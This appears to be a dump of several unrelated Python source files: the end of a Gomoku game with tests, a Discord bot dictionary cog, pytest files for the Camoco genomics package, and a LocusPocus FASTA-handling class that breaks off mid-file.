of color col of length length in the row R and the second element is
the number of semiopen sequences of length length in row R
'''
open_seq_count, semi_open_seq_count = 0, 0
# starts at (y_start, x_start) and goes in the direciton (d_y, d_x)
dir = -1
if (x_start == 0 or y_start == 0):
dir = 1
board_size = len(board)
# Create the stuff for the row R and puts it into a list in order.
# Cannot use ndarray :( because they are not allowed
R = []
x_counter, y_counter = x_start, y_start
while (x_counter >= 0 and y_counter >= 0 and x_counter < board_size and y_counter < board_size):
R.append(board[y_counter][x_counter])
y_counter += dir * d_y
x_counter += dir * d_x
# Checks for errors
if len(R) <= length:
return (0, 0)
# Checks for sequences at the edges
if R[:length] == [col] * length and R[length] == ' ':
semi_open_seq_count += 1
if R[-length:] == [col] * length and R[-length - 1] == ' ':
semi_open_seq_count += 1
# iterate through R
for w in range(1, len(R) - length):
if R[w:w + length] == [col] * length:
# Check open sequences
if R[w - 1] == ' ' and R[w + length] == ' ':
open_seq_count += 1
# Check semi open sequences
elif (R[w - 1] == ' ' or R[w + length] == ' ') and R[w + length] != col and R[w - 1] != col:
semi_open_seq_count += 1
return open_seq_count, semi_open_seq_count
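# Example (mirrors test_detect_row below): with 'w' stones at (1,5), (2,5) and
# (3,5) on an otherwise empty 8x8 board, scanning down column 5 finds one open
# sequence and no semi-open ones:
#   detect_row(board, 'w', 0, 5, 3, 1, 0)  # -> (1, 0)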
def detect_rows(board, col, length):
'''Return a tuple whose first element is the number of open sequences
of color col and length length on the entire board, and whose second
element is the number of semi-open sequences of color col and length
length on the entire board.
'''
open_seq_count, semi_open_seq_count = 0, 0
board_length = len(board)
for w in range(board_length):
# Checks for up to down sequences
x1, x2 = detect_row(board, col, 0, w, length, 1, 0)
open_seq_count += x1
semi_open_seq_count += x2
# Checks for left to right sequences
x1, x2 = detect_row(board, col, w, 0, length, 0, 1)
open_seq_count += x1
semi_open_seq_count += x2
            # Checks for "\" diagonal sequences (row and column both increase):
            # X
            #  X
            #   X
x1, x2 = detect_row(board, col, 0, w, length, 1, 1)
open_seq_count += x1
semi_open_seq_count += x2
if w != 0:
x1, x2 = detect_row(board, col, w, 0, length, 1, 1)
open_seq_count += x1
semi_open_seq_count += x2
            # Checks for "/" diagonal sequences (row decreases as column increases):
            #   X
            #  X
            # X
x1, x2 = detect_row(board, col, w, 0, length, -1, 1)
open_seq_count += x1
semi_open_seq_count += x2
if w != 0:
x1, x2 = detect_row(board, col, board_length - 1, w, length, 1, -1)
open_seq_count += x1
semi_open_seq_count += x2
return open_seq_count, semi_open_seq_count
'''
def search_max(board):
move_y, move_x = -1, -1
max_score = -11111111111111111111111111111111111111111111111
for i in range(8):
for j in range(8):
if (board[i][j] == ' '):
board[i][j] = 'b'
if iswin(board) == 1:
return i, j
s = score(board)
if (s > max_score):
move_y, move_x = i, j
max_score = s
board[i][j] = ' '
return move_y, move_x
'''
def copy_new(board):
    length_board = len(board)
    new_board = [[' '] * length_board for a in range(length_board)]
    for c in range(length_board):
        for d in range(length_board):
            new_board[c][d] = board[c][d]
    return new_board
def search_max(board):
scores_list = []
coords_list = []
for i in range(8):
for j in range(8):
if board[i][j] == ' ':
new_board = copy_new(board)
new_board[i][j] = 'b'
coords_list.append((i, j))
scores_list.append(score(new_board))
ind = scores_list.index(max(scores_list))
return coords_list[ind]
def score(board): # return int
'''Basic scoring polynomial returns int score. Higher score is better for black.'''
MAX_SCORE = 100000
open_b = {}
semi_open_b = {}
open_w = {}
semi_open_w = {}
for i in range(2, 6):
open_b[i], semi_open_b[i] = detect_rows(board, "b", i)
open_w[i], semi_open_w[i] = detect_rows(board, "w", i)
if open_b[5] >= 1 or semi_open_b[5] >= 1:
return MAX_SCORE
elif open_w[5] >= 1 or semi_open_w[5] >= 1:
return -MAX_SCORE
return (-10000 * (open_w[4] + semi_open_w[4])+
500 * open_b[4] +
50 * semi_open_b[4] +
-100 * open_w[3] +
-30 * semi_open_w[3] +
50 * open_b[3] +
10 * semi_open_b[3] +
open_b[2] + semi_open_b[2] - open_w[2] - semi_open_w[2])
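# Example (illustrative): an empty board scores 0; a single open black run of
# three contributes +50 via the open_b[3] term, while an open white four
# dominates at -10000.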
def iswin(board):
    draw = True
    for i in range(len(board)):
        for j in range(len(board)):
            if draw and board[i][j] == ' ':
                draw = False
            # Each direction is checked with an independent 'if', so a win in
            # one direction is never masked by another.
            # horizontal case:
            if j + 4 < len(board):
                temp_1 = []
                for b in range(5):
                    temp_1.append(board[i][j+b])
                if (temp_1 == ["b"] * 5):
                    return 1
                if (temp_1 == ["w"] * 5):
                    return 0
            # vertical case:
            if i + 4 < len(board):
                temp_2 = []
                for c in range(5):
                    temp_2.append(board[i+c][j])
                if (temp_2 == ["b"] * 5):
                    return 1
                if (temp_2 == ["w"] * 5):
                    return 0
            # diagonal cases:
            # first case: increasing the row number and the column number:
            if i + 4 < len(board) and j + 4 < len(board):
                temp = []
                for a in range(5):
                    temp.append(board[i+a][j+a])
                if (temp == ["b"] * 5):
                    return 1
                if (temp == ["w"] * 5):
                    return 0
            # second case: increasing the row number but decreasing the column
            # number (j - 4 must be >= 0, or negative indices wrap around):
            if i + 4 < len(board) and j - 4 >= 0:
                temp_3 = []
                for d in range(5):
                    temp_3.append(board[i+d][j-d])
                if (temp_3 == ["b"] * 5):
                    return 1
                if (temp_3 == ["w"] * 5):
                    return 0
    if draw:
        return 2
    return 3
def iswindebugging(board):
    draw = True
    for i in range(len(board)):
        for j in range(len(board)):
            if draw and board[i][j] == ' ':
                draw = False
            # Directions are checked independently, as in iswin above.
            # horizontal case:
            if j + 4 < len(board):
                temp_1 = []
                for b in range(5):
                    temp_1.append(board[i][j+b])
                if (temp_1 == ["b"] * 5):
                    return 1, i, j
                if (temp_1 == ["w"] * 5):
                    return 0, i, j
            # vertical case:
            if i + 4 < len(board):
                temp_2 = []
                for c in range(5):
                    temp_2.append(board[i+c][j])
                if (temp_2 == ["b"] * 5):
                    return 1, i, j
                if (temp_2 == ["w"] * 5):
                    return 0, i, j
            # diagonal cases:
            # first case: increasing the row number and the column number:
            if i + 4 < len(board) and j + 4 < len(board):
                temp = []
                for a in range(5):
                    temp.append(board[i+a][j+a])
                if (temp == ["b"] * 5):
                    return 1, i, j
                if (temp == ["w"] * 5):
                    return 0, i, j
            # second case: increasing the row number but decreasing the column
            # number (j - 4 must be >= 0, or negative indices wrap around):
            if i + 4 < len(board) and j - 4 >= 0:
                temp_3 = []
                for d in range(5):
                    temp_3.append(board[i+d][j-d])
                if (temp_3 == ["b"] * 5):
                    return 1, i, j
                if (temp_3 == ["w"] * 5):
                    return 0, i, j
    if draw:
        return 2
    return 3
def newiswin(board):
draw = True
for i in range(len(board)):
for j in range(len(board)):
if draw and board[i][j] == ' ':
draw = False
if (j + 4 < len(board)):
if (board[i][j] == 'b' and
board[i][j + 1] == 'b' and
board[i][j + 2] == 'b' and
board[i][j + 3] == 'b' and
board[i][j + 4] == 'b' and
(j < 1 or board[i][j - 1] != 'b') and
(j + 5 >= 8 or board[i][j + 5] != 'b')):
return 1
if (board[i][j] == 'w' and
board[i][j + 1] == 'w' and
board[i][j + 2] == 'w' and
board[i][j + 3] == 'w' and
board[i][j + 4] == 'w' and
(j < 1 or board[i][j - 1] != 'w') and
(j + 5 >= 8 or board[i][j + 5] != 'w')):
return 0
            if (i + 4 < len(board) and j + 4 < len(board)):  # guard the column too, or edge stones raise IndexError
if (board[i][j] == 'b' and
board[i + 1][j + 1] == 'b' and
board[i + 2][j + 2] == 'b' and
board[i + 3][j + 3] == 'b' and
board[i + 4][j + 4] == 'b' and
(i < 1 or j < 1 or board[i - 1][j - 1] != 'b') and
(i + 5 >= 8 or j + 5 >= 8 or board[i + 5][j + 5] != 'b')):
return 1
if (board[i][j] == 'w' and
board[i + 1][j + 1] == 'w' and
board[i + 2][j + 2] == 'w' and
board[i + 3][j + 3] == 'w' and
board[i + 4][j + 4] == 'w' and
(i < 1 or j < 1 or board[i - 1][j - 1] != 'w') and
(i + 5 >= 8 or j + 5 >= 8 or board[i + 5][j + 5] != 'w')):
return 0
            if (i - 4 >= 0 and j + 4 < len(board)):  # guard the column too, or edge stones raise IndexError
if (board[i][j] == 'b' and
board[i - 1][j + 1] == 'b' and
board[i - 2][j + 2] == 'b' and
board[i - 3][j + 3] == 'b' and
board[i - 4][j + 4] == 'b' and
(i + 1 >= 8 or j < 1 or board[i + 1][j - 1] != 'b') and
(i < 5 or j + 5 >= 8 or board[i - 5][j + 5] != 'b')):
return 1
if (board[i][j] == 'w' and
board[i - 1][j + 1] == 'w' and
board[i - 2][j + 2] == 'w' and
board[i - 3][j + 3] == 'w' and
board[i - 4][j + 4] == 'w' and
(i + 1 >= 8 or j < 1 or board[i + 1][j - 1] != 'w') and
(i < 5 or j + 5 >= 8 or board[i - 5][j + 5] != 'w')):
return 0
if (i + 4 < len(board)):
if (board[i][j] == 'b' and
board[i + 1][j] == 'b' and
board[i + 2][j] == 'b' and
board[i + 3][j] == 'b' and
board[i + 4][j] == 'b' and
(i + 5 >= 8 or board[i + 5][j] != 'b') and
(i < 1 or board[i - 1][j] != 'b')):
return 1
if (board[i][j] == 'w' and
board[i + 1][j] == 'w' and
board[i + 2][j] == 'w' and
board[i + 3][j] == 'w' and
board[i + 4][j] == 'w' and
(i + 5 >= 8 or board[i + 5][j] != 'w') and
(i < 1 or board[i - 1][j] != 'w')):
return 0
if draw:
return 2
return 3
def is_win(board):
states = ["White won", "Black won", "Draw", "Continue playing"]
return states[newiswin(board)]
def print_board(board): # return void
s = "*"
for i in range(len(board[0])-1):
s += str(i%10) + "|"
s += str((len(board[0])-1)%10)
s += "*\n"
for i in range(len(board)):
s += str(i%10)
for j in range(len(board[0])-1):
s += str(board[i][j]) + "|"
s += str(board[i][len(board[0])-1])
s += "*\n"
s += (len(board[0])*2 + 1)*"*"
print(s)
def make_empty_board(sz):
board = []
for _ in range(sz):
board.append([" "]*sz)
return board
def analysis(board):
for c, full_name in [["b", "Black"], ["w", "White"]]:
print("%s stones" % (full_name))
for i in range(2, 6):
open, semi_open = detect_rows(board, c, i)
print("Open rows of length %d: %d" % (i, open))
print("Semi-open rows of length %d: %d" % (i, semi_open))
def play_gomoku(board_size):
board = make_empty_board(board_size)
board_height = len(board)
board_width = len(board[0])
while True:
print_board(board)
if is_empty(board):
move_y = board_height // 2
move_x = board_width // 2
else:
move_y, move_x = search_max(board)
print("Computer move: (%d, %d)" % (move_y, move_x))
board[move_y][move_x] = "b"
print_board(board)
analysis(board)
game_res = is_win(board)
if game_res in ["White won", "Black won", "Draw"]:
return game_res
print("Your move:")
move_y = int(input("y coord: "))
move_x = int(input("x coord: "))
board[move_y][move_x] = "w"
print_board(board)
analysis(board)
game_res = is_win(board)
if game_res in ["White won", "Black won", "Draw"]:
return game_res
def put_seq_on_board(board, y, x, d_y, d_x, length, col):
for _ in range(length):
board[y][x] = col
y += d_y
x += d_x
def test_is_empty():
board = make_empty_board(8)
if is_empty(board):
print("TEST CASE for is_empty PASSED")
else:
print("TEST CASE for is_empty FAILED")
def test_is_bounded():
board = make_empty_board(8)
x = 5; y = 1; d_x = 0; d_y = 1; length = 3
put_seq_on_board(board, y, x, d_y, d_x, length, "w")
print_board(board)
y_end = 3
x_end = 5
if is_bounded(board, y_end, x_end, length, d_y, d_x) == 'OPEN':
print("TEST CASE for is_bounded PASSED")
else:
print("TEST CASE for is_bounded FAILED")
def test_detect_row():
board = make_empty_board(8)
x = 5; y = 1; d_x = 0; d_y = 1; length = 3
put_seq_on_board(board, y, x, d_y, d_x, length, "w")
print_board(board)
if detect_row(board, "w", 0,x,length,d_y,d_x) == (1,0):
print("TEST CASE for detect_row PASSED")
else:
print("TEST CASE for detect_row FAILED")
def test_detect_rows():
board = make_empty_board(8)
x = 5; y = 1; d_x = 0; d_y = 1; length = 3; col = 'w'
put_seq_on_board(board, y, x, d_y, d_x, length, "w")
print_board(board)
if detect_rows(board, col,length) == (1,0):
print("TEST CASE for detect_rows PASSED")
else:
print("TEST CASE for detect_rows FAILED")
def test_search_max():
board = make_empty_board(8)
x = 5; y = 0; d_x = 0; d_y = 1; length = 4; col = 'w'
put_seq_on_board(board, y, x, d_y, d_x, length, col)
x = 6; y = 0; d_x = 0; d_y = 1; length = 4; col = 'b'
put_seq_on_board(board, y, x, d_y, d_x, length, col)
print_board(board)
if search_max(board) == (4,6):
print("TEST CASE for search_max PASSED")
else:
print("TEST CASE for search_max FAILED")
def easy_testset_for_main_functions():
test_is_empty()
test_is_bounded()
test_detect_row()
test_detect_rows()
test_search_max()
def some_tests():
board = make_empty_board(8)
board[0][5] = "w"
board[0][6] = "b"
y = 5; x = 2; d_x = 0; d_y = 1; length = 3
put_seq_on_board(board, y, x, d_y, d_x, length, "w")
print_board(board)
analysis(board)
# Expected output:
# *0|1|2|3|4|5|6|7*
# 0 | | | | |w|b| *
# 1 | | | | | | | *
# 2 | | | | | | | *
# 3 | | | | | | | *
# 4 | | | | | | | *
# 5 | |w| | | | | *
# 6 | |w| | | | | *
# 7 | |w| | | | | *
# *****************
# Black stones:
# Open rows of length 2: 0
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 0
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
# Semi-open rows of length 5: 0
# White stones:
# Open rows of length 2: 0
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 1
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
# Semi-open rows of length 5: 0
y = 3; x = 5; d_x = -1; d_y = 1; length = 2
put_seq_on_board(board, y, x, d_y, d_x, length, "b")
print_board(board)
analysis(board)
# Expected output:
# *0|1|2|3|4|5|6|7*
# 0 | | | | |w|b| *
# 1 | | | | | | | *
# 2 | | | | | | | *
# 3 | | | | |b| | *
# 4 | | | |b| | | *
# 5 | |w| | | | | *
# 6 | |w| | | | | *
# 7 | |w| | | | | *
# *****************
#
# Black stones:
# Open rows of length 2: 1
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 0
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
# Semi-open rows of length 5: 0
# White stones:
# Open rows of length 2: 0
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 1
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
# Semi-open rows of length 5: 0
#
y = 5; x = 3; d_x = -1; d_y = 1; length = 1
put_seq_on_board(board, y, x, d_y, d_x, length, "b")
print_board(board)
analysis(board) # WHY ARE THERE SEMISCOLONS!!!!!!!!!!!!!!!!!!!!!!!!
# Expected output:
# *0|1|2|3|4|5|6|7*
# 0 | | | | |w|b| *
# 1 | | | | | | | *
# 2 | | | | | | | *
# 3 | | | | |b| | *
# 4 | | | |b| | | *
# 5 | |w|b| | | | *
# 6 | |w| | | | | *
# 7 | |w| | | | | *
# *****************
#
#
# Black stones:
# Open rows of length 2: 0
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 1
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
# Semi-open rows of length 5: 0
# White stones:
# Open rows of length 2: 0
# Semi-open rows of length 2: 0
# Open rows of length 3: 0
# Semi-open rows of length 3: 1
# Open rows of length 4: 0
# Semi-open rows of length 4: 0
# Open rows of length 5: 0
if __name__ == '__main__':
play_gomoku(8)
``` |
{
"source": "jonah-chen/eve-bot",
"score": 3
} |
#### File: eve-bot/cogs/define.py
```python
import nextcord
from nextcord.ext import commands
from bs4 import BeautifulSoup
import urllib.request
from PyDictionary import PyDictionary # install Pydictionary
dictionary = PyDictionary()
def get_definition(words):
word = "-".join(words)
url = "https://www.dictionary.com/browse/" + word
try:
htmlfile = urllib.request.urlopen(url)
soup = BeautifulSoup(htmlfile, "lxml")
definition = soup.find(class_="one-click-content css-nnyc96 e1q3nk1v1")
return definition, soup
    except Exception:
return None, None
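# Minimal sketch (illustrative query): get_definition(['ad', 'hoc']) fetches
# https://www.dictionary.com/browse/ad-hoc and returns (definition_tag, soup),
# or (None, None) when the page cannot be retrieved.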
class Dictionary(commands.Cog):
"""
Dictionary definitions
"""
def __init__(self, client):
self.client = client
@commands.command(usage="<word>", aliases=["definition", "def"])
async def define(self, ctx, *, word):
"""
Define a word.
"""
# First check how many words there are
words = word.split()
if len(words) == 1 and dictionary.meaning(words[0]) != None:
word = words[0]
await ctx.send("One second...")
nouns = []
verbs = []
adjectives = []
adverbs = []
# Create embed
dict_embed = nextcord.Embed(
title = "Dictionary Definition",
description = f"Query: {word}",
colour = 0x0adbfc
)
dict_embed.set_thumbnail(url="https://media.discordapp.net/attachments/952037974420385793/952038039457267712/Eve_Code_Ultimate_2.png")
dict_embed.set_footer(text="Github: https://github.com/Chubbyman2/eve-bot")
if word.lower() == "praxis":
nouns.append(
"the worst course in the Engineering Science program")
elif word.lower() == "calculus":
nouns.append(
"the most rigorous course in the Engineering Science program")
for key in dictionary.meaning(word):
if key == "Noun":
for definition in dictionary.meaning(word)[key]:
nouns.append(definition)
elif key == "Verb":
for definition in dictionary.meaning(word)[key]:
verbs.append(definition)
elif key == "Adjective":
for definition in dictionary.meaning(word)[key]:
adjectives.append(definition)
elif key == "Adverb":
for definition in dictionary.meaning(word)[key]:
adverbs.append(definition)
if len(nouns) != 0:
for noun in nouns:
temp = noun
for letter in noun:
if letter == "(":
noun += ")"
nouns[nouns.index(temp)] = noun
dict_embed.add_field(name="Nouns", value="```-" + "\n-".join(nouns) + "```", inline=False)
if len(verbs) != 0:
for verb in verbs:
temp = verb
for letter in verb:
if letter == "(":
verb += ")"
verbs[verbs.index(temp)] = verb
dict_embed.add_field(name="Verbs", value="```-" + "\n-".join(verbs) + "```", inline=False)
if len(adjectives) != 0:
for adjective in adjectives:
temp = adjective
for letter in adjective:
if letter == "(":
adjective += ")"
adjectives[adjectives.index(temp)] = adjective
dict_embed.add_field(name="Adjectives", value="```-" + "\n-".join(adjectives) + "```", inline=False)
if len(adverbs) != 0:
for adverb in adverbs:
temp = adverb
for letter in adverb:
if letter == "(":
adverb += ")"
adverbs[adverbs.index(temp)] = adverb
dict_embed.add_field(name="Adverbs", value="```-" + "\n-".join(adverbs) + "```", inline=False)
await ctx.send(embed=dict_embed)
# If it's more than one word
else:
await ctx.send("One second...")
# Create embed
embed_query = " ".join(words)
dict_embed = nextcord.Embed(
title = "Dictionary Definition",
description = f"Query: {embed_query}",
colour = 0x0adbfc
)
dict_embed.set_thumbnail(url="https://media.discordapp.net/attachments/952037974420385793/952038039457267712/Eve_Code_Ultimate_2.png")
dict_embed.set_footer(text="Github: https://github.com/Chubbyman2/eve-bot")
if get_definition(words)[0] == None:
try:
word = get_definition(words)[1].find(class_="kw")
word = word.get_text()
words = word.split(" ")
if get_definition(words)[0] != None:
definition = get_definition(words)[0]
definition = definition.get_text()
dict_embed.add_field(name="Definition", value="```" + str(definition) + "```", inline=False)
await ctx.send(embed=dict_embed)
return
else:
await ctx.send(f"Apologies, I could not find the definition for {' '.join(words)}.")
return
except AttributeError:
await ctx.send(f"Apologies, I could not find the definition for {' '.join(words)}.")
return
else:
definition = get_definition(words)[0]
definition = definition.get_text()
dict_embed.add_field(name="Definition", value="```" + str(definition) + "```", inline=False)
await ctx.send(embed=dict_embed)
def setup(client):
client.add_cog(Dictionary(client))
``` |
{
"source": "jonahcullen/Camoco",
"score": 2
} |
#### File: Camoco/tests/test_Expr.py
```python
import pytest
import numpy as np
def test_nans_in_same_place(testCOB):
norm_expr = testCOB.expr(raw=False)
    raw_expr = testCOB.expr(raw=True).loc[norm_expr.index, norm_expr.columns]  # .ix was removed from pandas
assert all(np.isnan(norm_expr) == np.isnan(raw_expr))
assert all(np.isnan(raw_expr) == np.isnan(norm_expr))
def test_inplace_nansort(testCOB):
x = np.random.rand(50000)
for i in np.random.randint(0,50000,500):
x[i] = np.nan
sorted_x = testCOB.inplace_nansort(x)
assert all(np.isnan(x) == np.isnan(sorted_x))
```
#### File: Camoco/tests/test_Locus.py
```python
import pytest
from itertools import chain
from camoco import Locus
from camoco.Config import cf
@pytest.fixture
def simple_Locus():
return Locus(1,100,200)
@pytest.fixture
def LocusX():
return Locus(1,100,200)
@pytest.fixture
def LocusY():
return Locus(1,300,400)
def test_locus_initialization(simple_Locus):
# numeric chromosomes
assert simple_Locus.chrom == '1'
assert simple_Locus.start == 100
assert simple_Locus.end == 200
assert len(simple_Locus) == 101
def test_distance_between_loci():
x = Locus(1,100,200)
y = Locus(1,300,400)
assert x - y == 99
def test_combine_loci(LocusX,LocusY):
z = LocusX + LocusY
assert len(z) == 301
def test_candidate_vs_bootstrap_length(testRefGen,testGWAS):
Term = next(testGWAS.iter_terms())
snps = Term.effective_loci(window_size=50000)
candidates = testRefGen.candidate_genes(snps,chain=False)
bootstraps = testRefGen.bootstrap_candidate_genes(snps,chain=False)
# Make sure we are pulling out the same number of random genes for
# Each locus
for c,b in zip(candidates,bootstraps):
assert len(c) == len(b)
assert len(set(chain(*candidates))) == len(set(chain(*bootstraps)))
def test_generate_from_id(Zm5bFGS):
random_gene = Zm5bFGS.random_gene()
assert random_gene == Zm5bFGS[random_gene.id]
```
#### File: Camoco/tests/test_Term.py
```python
import pytest
from camoco import Term
from camoco import Locus
@pytest.fixture
def testTerm():
loci = [
# Overlapping Loci, No windows
Locus(1,100,500,score=0), Locus(1,400,700,score=5),
# Loci with Overlapping windows
Locus(2,100,200,window=100,score=0),
Locus(2,300,500,window=100,score=5),
# SNPs with overlapping windows
Locus(3,100,window=50,score=5),
Locus(3,200,window=50,score=0),
# Three overlapping loci, one not
Locus(4,100,window=80,score=1),
Locus(4,200,window=80,score=2),
Locus(4,300,window=80,score=3),
Locus(4,400,window=10,score=4) # <- one not
]
return Term('test',desc='hello',loci=loci,attr1=True,attr2=False)
def test_init():
x = Term('testTerm',desc='for testing',loci=[Locus(1,2),Locus(1,3)],foo='bar')
def test_term_init(testTerm):
assert testTerm.id == 'test'
assert testTerm.desc == 'hello'
assert testTerm['attr1'] == True
assert testTerm['attr2'] == False
def test_add_Locus(testTerm):
new_locus = Locus(6,100)
testTerm.add_locus(new_locus)
assert new_locus in testTerm.loci
testTerm.loci.remove(new_locus)
def test_term_len(testTerm):
assert len(testTerm) == len(testTerm.loci)
def test_effective_loci(testTerm):
assert len(testTerm.effective_loci()) == 5
def test_effective_loci_custom_window(testTerm):
assert len(testTerm.effective_loci(window_size=150)) == 4
def test_effective_loci_lens(testTerm):
assert list(map(len,testTerm.effective_loci())) == [601,401,101,201,1]
def test_strongest_loci(testTerm):
assert list(
map(lambda x:x.start, testTerm.strongest_loci('score',lowest=False))
) == [400,300,100,300,400]
def test_flanking_loci(testTerm):
assert len(testTerm.flanking_loci(Locus(4,250),window_size=100)) == 2
assert len(testTerm.flanking_loci(Locus(4,250),window_size=400)) == 4
def test_copy(testTerm):
copy = testTerm.copy()
assert len(copy) == len(testTerm)
def test_str(testTerm):
assert isinstance(str(testTerm),str)
def test_repr(testTerm):
assert isinstance(repr(testTerm),str)
``` |
{
"source": "jonahcullen/LocusPocus",
"score": 2
} |
#### File: LocusPocus/locuspocus/Exceptions.py
```python
class ZeroWindowError(Exception): # pragma: no cover
def __init__(self,expr,message,*args):
self.expr = expr
self.message = (
            'Operation requiring window, but window is 0: ' +
            message.format(*args)
)
```
#### File: LocusPocus/locuspocus/Fasta.py
```python
from collections import defaultdict
import logging
import re
import numpy as np
from minus80 import Freezable
from minus80.RawFile import RawFile
import reprlib
import pprint
from functools import lru_cache
from locuspocus import Chromosome
class Fasta(Freezable):
'''
A pythonic interface to a FASTA file. This interface
allows convenient slicing into contigs (chromosomes).
>>> from locuspocus import Fasta
>>> x = Fasta.from_file('example.fa')
'''
log = logging.getLogger(__name__)
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
)
handler.setFormatter(formatter)
if not len(log.handlers):
log.addHandler(handler)
log.setLevel(logging.INFO)
def __init__(self,name,parent=None):
'''
Load a Fasta object from the Minus80.
Parameters
----------
name : str
The name of the frozen object
Returns
-------
A Fasta object
'''
super().__init__(name,parent=parent)
# Load up from the database
self._initialize_tables()
def _initialize_tables(self):
'''
Initialize the tables for the FASTA class
NOTE: internal method
'''
cur = self._db.cursor()
cur.execute('''
CREATE TABLE IF NOT EXISTS added_order (
aorder INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT
);
''')
cur.execute('''
CREATE TABLE IF NOT EXISTS nicknames (
nickname TEXT,
chrom TEXT,
PRIMARY KEY(nickname,chrom),
FOREIGN KEY(chrom) REFERENCES chroms(chrom)
)
''')
cur.execute('''
CREATE TABLE IF NOT EXISTS attributes (
chrom TEXT,
attribute TEXT,
PRIMARY KEY(chrom,attribute),
FOREIGN KEY(chrom) REFERENCES chroms(chrom)
)
''')
def add_chrom(self,chrom,cur=None,force=False):
'''
Add a chromosome to the Fasta object.
Parameters
----------
        chrom : Chromosome
            The Chromosome object to add
        force : bool (default: False)
            If True, replace an existing chromosome with the same name
'''
self.log.info(f'Adding {chrom.name}')
# Check for duplicates
if chrom.name in self:
if not force:
raise ValueError(f'{chrom.name} already in FASTA')
else:
if cur is None:
cur = self._db.cursor()
cur.execute(
'''
INSERT OR REPLACE INTO added_order
(name)
VALUES (?)
''',(chrom.name,)
)
for x in chrom._attrs:
self._add_attribute(chrom.name,x)
seqarray = np.array(chrom.seq)
self._bcolz_array(chrom.name,seqarray)
self.cache_clear()
def chrom_names(self):
'''
Returns an iterable of chromosome names
Parameters
----------
None
Returns
-------
An iterable of chromosome names in added order
'''
return (x for (x,) in self._db.cursor().execute('''
SELECT name FROM added_order ORDER BY aorder
'''))
def cache_clear(self):
self.__getitem__.cache_clear()
@classmethod
def from_file(cls,name,fasta_file,force=False,parent=None):
'''
Create a Fasta object from a file.
'''
self = cls(name,parent=parent)
with RawFile(fasta_file) as IN, self._db as db:
cur = db.cursor()
cur_chrom = None
seqs = []
name, attrs = None,None
for line in IN:
line = line.strip()
if line.startswith('>'):
# Finish the last chromosome before adding a new one
if len(seqs) > 0:
cur_chrom = Chromosome(name,seqs,*attrs)
self.add_chrom(cur_chrom,cur=cur,force=force)
seqs = []
name,*attrs = line.lstrip('>').split()
else:
seqs += line
#cur_chrom.seq = np.append(cur_chrom.seq,list(line))
# Add the last chromosome
cur_chrom = Chromosome(name,seqs,*attrs)
self.add_chrom(cur_chrom,cur=cur,force=force)
return self
def __iter__(self):
'''
Iterate over chromosome objects
'''
chroms = self._db.cursor().execute('SELECT name FROM added_order ORDER BY aorder')
for (chrom,) in chroms:
yield self[chrom]
def __len__(self):
'''
Returns the number of chroms in the Fasta
'''
return self._db.cursor().execute('''
SELECT COUNT(*) FROM added_order
''').fetchone()[0]
def __contains__(self,obj):
'''
Returns boolean indicating if a named
contig (chromosome) is in the fasta.
'''
if isinstance(obj,Chromosome):
obj = obj.name
cur = self._db.cursor()
# Check if in chrom names
in_added = cur.execute('''
SELECT COUNT(*) FROM added_order
WHERE name = ?
''',(obj,)).fetchone()[0]
if in_added == 1:
return True
# Check if in aliases
in_alias = cur.execute('''
SELECT COUNT(*) FROM nicknames
WHERE nickname = ?
''',(obj,)).fetchone()[0]
if in_alias == 1:
return True
# Otherise its not here
return False
@lru_cache(maxsize=128)
def __getitem__(self,chrom_name):
if chrom_name not in self:
raise ValueError(f'{chrom_name} not in {self._m80_name}')
        try:
            seq_array = self._bcolz_array(chrom_name)
        except Exception:
            # Fall back to resolving the name through the nicknames table
            chrom_name = self._get_nickname(chrom_name)
            seq_array = self._bcolz_array(chrom_name)
        # NOTE: deliberately not inside a 'finally' block -- a return in
        # 'finally' would silently swallow any exception raised above
        attrs = [x[0] for x in self._db.cursor().execute('''
            SELECT attribute FROM attributes
            WHERE chrom = ?
            ORDER BY rowid -- This preserves the ordering of attrs
        ''',(chrom_name,))]
        return Chromosome(chrom_name,seq_array,*attrs)
def to_fasta(self,filename,line_length=70):
'''
Print the chromosomes to a file in FASTA format
Paramaters
----------
filename : str
The output filename
line_length : int (default: 70)
The number of nucleotides per line
Returns
-------
None
'''
with open(filename,'w') as OUT:
for chrom_name in self.chrom_names():
print(f'Printing out {chrom_name}')
chrom = self[chrom_name]
#easy_id = ids[chrom_name]
start_length = len(chrom)
#if easy_id == 'chrUn':
# easy_id = easy_id + '_' + chrom_name
print(f'>{chrom_name} {"|".join(chrom._attrs)}',file=OUT)
printed_length = 0
            for i in range(0, len(chrom), line_length):
                sequence = chrom.seq[i:i+line_length]
print(''.join(sequence),file=OUT)
printed_length += len(sequence)
if printed_length != start_length:
raise ValueError('Chromosome was truncated during printing')
return None
def _add_attribute(self,chrom_name,attr,cur=None):
'''
Add an attribute the the Fasta object.
Attributes describe chromosomes and
often follow the '>' token in the FASTA file.
Parameters
----------
chrom_name : str
The name of the chromosome you are adding
an attribute to
attr : str
the attribute you are adding
'''
if cur is None:
cur = self._db.cursor()
cur.execute(
'''
INSERT INTO attributes
(chrom,attribute)
VALUES (?,?)
''',
(chrom_name,attr)
)
self.cache_clear()
def _add_nickname(self,chrom,nickname,cur=None):
'''
Add a nickname for a chromosome
Parameters
----------
chrom : str
The chromosome you want to nickname
nickname : str
The alternative name for the chromosome
'''
if cur is None:
cur = self._db.cursor()
cur.execute(
'''
INSERT OR REPLACE INTO nicknames
(nickname,chrom)
VALUES (?,?)
''',
(nickname,chrom)
)
def _get_nickname(self,nickname):
'''
Get a chromosomem name by nickname
'''
return self._db.cursor().execute('''
SELECT chrom FROM nicknames
WHERE nickname = ?
''',(nickname,)).fetchone()[0]
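    # Minimal sketch (hypothetical names): register an alias so lookups by
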